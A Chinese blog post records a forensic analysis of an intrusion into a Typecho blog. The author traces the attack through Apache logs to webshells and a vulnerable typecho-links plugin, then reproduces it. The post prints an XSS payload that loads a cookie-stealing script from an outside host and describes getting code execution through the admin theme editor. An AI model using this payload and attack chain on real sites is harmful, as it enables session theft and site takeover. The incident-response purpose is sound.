基友szrzvdny的朋友博客被入侵了,由于是虚拟空间,所以只有apache访问日志以供分析

这里已经做去敏操作了,以供学习:

链接: https://pan.baidu.com/s/1JUII7_ZOK1SIxnWxlzu0Hw 密码: bykr

 

整个事情发生的挺突然的,我也是第一次搞这种溯源、应急响应的东西~一想到说不定就拿到了typecho的0day,其实还是很激动的。

首先分析日志,Linux可以用grep,我 ,Windows  ,Notepad++

 

首先直接查找木马文件

首先搜一搜常用的恶意函数,例如Eval、assert、phpinfo()、pwd等等

搜索PHPINFO()的时候,找到了大量的404页面访问记录

最后通过分析,得到了一句话木马地址为/1.php  以及 /1_1.php

 

由于Apache的log默认不记录post数据,这些文件像是凭空出现一般,接下来我们通过IP来反查!

通过访问一句话木马的频率,得到了以下可疑IP:

223.104.170.145
103.250.73.27
112.120.33.163

根据访问时间,以及访问动作,锁定112.120.33.163为攻击者IP

可以看到嫌疑人通过两天的踩点,在3月16日访问了/index.php/action/links-edit后,3月18日入侵进了后台。

可能你跟我想的一样,对没错,这就是通过XSS入侵的一次安全事件

github看了源码之后发现,源程序并无action/links-edit这些函数方法

而这一切的问题都出在一款插件上: typecho-links

该插件是一款管理友情链接的拓展

分析一波源码

主要的漏洞利用链:

垂直越权(前台添加links)—XSS(links未过滤,直接入库)—CSRF (直接以管理员权限执行某些操作)

简单分析下源码~

越权,未验证用户权限


XSS,未过滤标签

本地复现:

搭建好博客,然后添加插件,退出登录

POST URL,虽然并未登陆,但是显示Link已经添加

 

确实添加成功了。

 

接下来插入xss payload

payload

name=<script src='http://1.1.1.1/xss.js'></script>&url=http%3A%2F%2Faaaaa&sort=aaa&image=&description=aaa&user=&do=insert&lid=

 

xss.js 通过引入JQuery以及调用Ajax方法,传递cookie

得到了cookie,进入后台后

 

通过/admin/theme-editor.php?theme=default&file=404.php

 

然后访问不存在的页面,触发包含404.php就可以了~

 

 

 

写的十分粗糙,旨在记录一下第一次分析日志的经历~

 

Love & Peace





本文链接地址: 分析、还原一次typecho入侵事件

原创文章,转载请注明: 转载自Lz1y's Blog

9 thoughts on “分析、还原一次typecho入侵事件

  1. 666 厉害了,这个插件算是上古插件了,最新的也是14年的了,因为我一般不用插件去实现友情链接所以没啥影响/滑稽

    1. 哈哈哈哈,确实是上古的,但是我搜了下友情链接貌似只有这个插件了,批量的话估计也是比较可观的?

发表评论

电子邮件地址不会被公开。 必填项已用*标注